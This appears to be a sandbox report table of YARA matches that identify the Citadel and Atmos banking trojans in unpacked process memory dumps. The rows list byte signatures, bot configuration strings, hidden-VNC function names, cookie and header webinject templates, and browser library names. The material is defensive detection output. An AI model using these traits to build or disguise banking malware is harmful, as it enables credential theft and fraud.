18.0.RuntimeBroker.exe.900000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 90 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 90 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 90 00
18.0.RuntimeBroker.exe.900000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
20.0.WinStore.App.exe.a10000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
20.0.WinStore.App.exe.a10000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
20.0.WinStore.App.exe.a10000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
20.0.WinStore.App.exe.a10000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A1 00
20.0.WinStore.App.exe.a10000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
25.0.dllhost.exe.ac0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
25.0.dllhost.exe.ac0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
25.0.dllhost.exe.ac0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
25.0.dllhost.exe.ac0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
25.0.dllhost.exe.ac0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
14.3.RuntimeBroker.exe.ab0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
14.3.RuntimeBroker.exe.ab0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
14.3.RuntimeBroker.exe.ab0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
14.3.RuntimeBroker.exe.ab0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AB 00
14.3.RuntimeBroker.exe.ab0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
24.0.svchost.exe.fb0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
24.0.svchost.exe.fb0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
24.0.svchost.exe.fb0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
24.0.svchost.exe.fb0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 FB 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 FB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 FB 00
24.0.svchost.exe.fb0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
27.3.backgroundTaskHost.exe.e20000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
27.3.backgroundTaskHost.exe.e20000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
27.3.backgroundTaskHost.exe.e20000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
27.3.backgroundTaskHost.exe.e20000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 E2 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 E2 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 E2 00
27.3.backgroundTaskHost.exe.e20000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
26.0.conhost.exe.30000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
26.0.conhost.exe.30000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
26.0.conhost.exe.30000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
26.0.conhost.exe.30000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 03 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 03 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 03 00
26.0.conhost.exe.30000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
2.3.sihost.exe.ac0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
2.3.sihost.exe.ac0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
2.3.sihost.exe.ac0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
2.3.sihost.exe.ac0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
2.3.sihost.exe.ac0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
28.3.RuntimeBroker.exe.810000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
28.3.RuntimeBroker.exe.810000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
28.3.RuntimeBroker.exe.810000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
28.3.RuntimeBroker.exe.810000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 81 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 81 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 81 00
28.3.RuntimeBroker.exe.810000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
9.0.RuntimeBroker.exe.110000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
9.0.RuntimeBroker.exe.110000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
9.0.RuntimeBroker.exe.110000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
9.0.RuntimeBroker.exe.110000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 11 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 11 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 11 00
